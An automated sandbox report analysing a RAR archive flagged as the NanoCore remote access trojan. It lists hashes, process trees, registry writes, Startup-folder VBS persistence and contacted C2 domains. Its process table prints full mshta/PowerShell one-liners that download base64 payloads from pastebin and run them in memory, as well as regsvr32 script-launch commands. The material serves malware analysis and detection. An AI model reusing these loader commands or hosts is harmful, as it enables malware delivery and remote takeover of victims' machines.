| File name: | 556ae53dbf0b25fd08605ce188dca29ddd22e8ec75ed14796abf74bbf528277a.rar |
| Full analysis: | https://app.any.run/tasks/e75529ee-9652-486a-816c-f5aecee8e36d |
| Verdict: | Malicious activity |
| Threats: | NanoCore is a Remote Access Trojan or RAT. This malware is highly customizable with plugins which allow attackers to tailor its functionality to their needs. Nanocore is created with the .NET framework and it’s available for purchase for just $25 from its “official” website. |
| Analysis date: | July 21, 2020, 01:12:28 |
| OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
| Tags: | |
| Indicators: | |
| MIME: | application/x-rar |
| File info: | RAR archive data, v5 |
| MD5: | 27A9A06F5C1023A134AE68BD0A399DD7 |
| SHA1: | C85285633CE0776097A76D88CDBE4AE7F23E1590 |
| SHA256: | 556AE53DBF0B25FD08605CE188DCA29DDD22E8EC75ED14796ABF74BBF528277A |
| SSDEEP: | 768:UmFhk3D679zmBnzdxNXAhS+ujgumpO3PSS89gXMPGBW+j7p6rIes5xEOE2we8rf/:HoO79qBz3igES6vSXBdj7sE6Jfh1 |
| .rar | | | RAR compressed archive (v5.0) (61.5) |
|---|---|---|
| .rar | | | RAR compressed archive (gen) (38.4) |
PID | CMD | Path | Indicators | Parent process | |||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
| 252 | "C:\Windows\System32\WScript.exe" "C:\Users\admin\AppData\Local\Temp\ad.vbs" | C:\Windows\System32\WScript.exe | powershell.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft ® Windows Based Script Host Exit code: 0 Version: 5.8.7600.16385 Modules
| |||||||||||||||
| 272 | "C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe" | C:\Windows\Microsoft.NET\Framework\v2.0.50727\MSBuild.exe | WScript.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: MSBuild.exe Exit code: 0 Version: 2.0.50727.5420 built by: Win7SP1 Modules
| |||||||||||||||
| 308 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/d46Ekc57').replace('$%f7f81a39-5f63-5b42-9efd-1f13b5431005#39;,'A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 640 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/iZiP2Vk7').replace('$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 1376 | "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/iZiP2Vk7').replace('$','A'))).EntryPoint.Invoke($N,$N) | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | mshta.exe | ||||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows PowerShell Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 1464 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2044 | "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\admin\AppData\Local\Temp\sdsd.vbs.BIN" | C:\Windows\System32\regsvr32.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2076 | "C:\Windows\System32\regsvr32.exe" /I /S "C:\Users\admin\AppData\Local\Temp\dgdgpoiopiopi.vbs.BIN" | C:\Windows\System32\regsvr32.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Microsoft(C) Register Server Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| 2100 | "C:\Windows\System32\cmd.exe" /c ping 127.0.0.1 -n 10 > nul & mshta.exe vbscript:CreateObject("Wscript.Shell").Run("powershell.exe -noexit -command [Reflection.Assembly]::Load([System.Convert]::FromBase64String((New-Object Net.WebClient).DownloadString('https://pastebin.com/raw/H2JdYYVV').replace('#$','A'))).EntryPoint.Invoke($N,$N)",0,true)(window.close) | C:\Windows\System32\cmd.exe | — | WScript.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Windows Command Processor Exit code: 0 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) Modules
| |||||||||||||||
| 2128 | ping 127.0.0.1 -n 10 | C:\Windows\system32\PING.EXE | — | cmd.exe | |||||||||||
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: TCP/IP Ping Command Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) Modules
| |||||||||||||||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtBMP |
Value: | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\Interface\Themes |
| Operation: | write | Name: | ShellExtIcon |
Value: | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E |
| Operation: | write | Name: | LanguageList |
Value: en-US | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\ArcHistory |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\AppData\Local\Temp\556ae53dbf0b25fd08605ce188dca29ddd22e8ec75ed14796abf74bbf528277a.rar | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | name |
Value: 120 | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | size |
Value: 80 | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | type |
Value: 120 | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\FileList\FileColumnWidths |
| Operation: | write | Name: | mtime |
Value: 100 | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CLASSES_ROOT\Local Settings\MuiCache\132\52C64B7E |
| Operation: | write | Name: | @C:\Windows\System32\wshext.dll,-4802 |
Value: VBScript Script File | |||
| (PID) Process: | (2244) WinRAR.exe | Key: | HKEY_CURRENT_USER\Software\WinRAR\DialogEditHistory\ExtrPath |
| Operation: | write | Name: | 0 |
Value: C:\Users\admin\Desktop | |||
PID | Process | Filename | Type | |
|---|---|---|---|---|
| 2796 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\0EBFS3HN6ZU77KXIATTL.temp | — | |
MD5:— | SHA256:— | |||
| 3096 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\9J08V4TLQ8XVR6MXF9ZB.temp | — | |
MD5:— | SHA256:— | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\T1WR9H82EBZ3YGZJU894.temp | — | |
MD5:— | SHA256:— | |||
| 2688 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\GRNJ1SE07BBWAVYI65KQ.temp | — | |
MD5:— | SHA256:— | |||
| 3876 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\TWL1K1BGQIOFOY9MC4PL.temp | — | |
MD5:— | SHA256:— | |||
| 3840 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\lksjdgksdgkhdsgkj.vbs | text | |
MD5:— | SHA256:— | |||
| 3840 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\docWS.vbs | text | |
MD5:— | SHA256:— | |||
| 3840 | WScript.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\وثائق مسربة.vbs | text | |
MD5:— | SHA256:— | |||
| 2244 | WinRAR.exe | C:\Users\admin\Desktop\وثائق مسربة.vbs | text | |
MD5:— | SHA256:— | |||
| 2640 | powershell.exe | C:\Users\admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms~RF115cb3.TMP | binary | |
MD5:— | SHA256:— | |||
PID | Process | Method | HTTP Code | IP | URL | CN | Type | Size | Reputation |
|---|---|---|---|---|---|---|---|---|---|
2796 | powershell.exe | GET | 200 | 62.240.36.45:80 | http://libya2020.com.ly/google01.mp3 | LY | txt | 366 Kb | suspicious |
3096 | powershell.exe | GET | 200 | 62.240.36.45:80 | http://libya2020.com.ly/TR.mp3 | LY | txt | 881 Kb | suspicious |
2688 | powershell.exe | GET | 200 | 62.240.36.45:80 | http://libya2020.com.ly/pic.mp3 | LY | txt | 607 Kb | suspicious |
2640 | powershell.exe | GET | 200 | 62.240.36.45:80 | http://libya2020.com.ly/ad.mp3 | LY | txt | 142 Kb | suspicious |
3876 | powershell.exe | GET | 200 | 62.240.36.45:80 | http://libya2020.com.ly/google0rvi.mp3 | LY | txt | 418 Kb | suspicious |
PID | Process | IP | Domain | ASN | CN | Reputation |
|---|---|---|---|---|---|---|
3096 | powershell.exe | 62.240.36.45:80 | libya2020.com.ly | GPTC Autonomous System, Tripoli Libya | LY | suspicious |
2796 | powershell.exe | 62.240.36.45:80 | libya2020.com.ly | GPTC Autonomous System, Tripoli Libya | LY | suspicious |
2640 | powershell.exe | 62.240.36.45:80 | libya2020.com.ly | GPTC Autonomous System, Tripoli Libya | LY | suspicious |
3092 | powershell.exe | 104.23.99.190:443 | pastebin.com | Cloudflare Inc | US | malicious |
— | — | 41.253.125.221:1177 | ad.libya2020.com.ly | GPTC Autonomous System, Tripoli Libya | LY | unknown |
3756 | powershell.exe | 104.23.99.190:443 | pastebin.com | Cloudflare Inc | US | malicious |
2408 | powershell.exe | 46.243.216.62:1313 | new.libya2020.com.ly | Core-Backbone GmbH | CH | unknown |
2516 | MSBuild.exe | 46.243.216.62:1414 | new.libya2020.com.ly | Core-Backbone GmbH | CH | unknown |
— | — | 8.8.8.8:53 | — | Google Inc. | US | malicious |
— | — | 46.243.216.62:3535 | new.libya2020.com.ly | Core-Backbone GmbH | CH | unknown |
Domain | IP | Reputation |
|---|---|---|
libya2020.com.ly |
| suspicious |
new.libya2020.com.ly |
| unknown |
pastebin.com |
| malicious |
tr.libya2020.com.ly |
| unknown |
ad.libya2020.com.ly |
| unknown |
wa.libya2020.com.ly |
| unknown |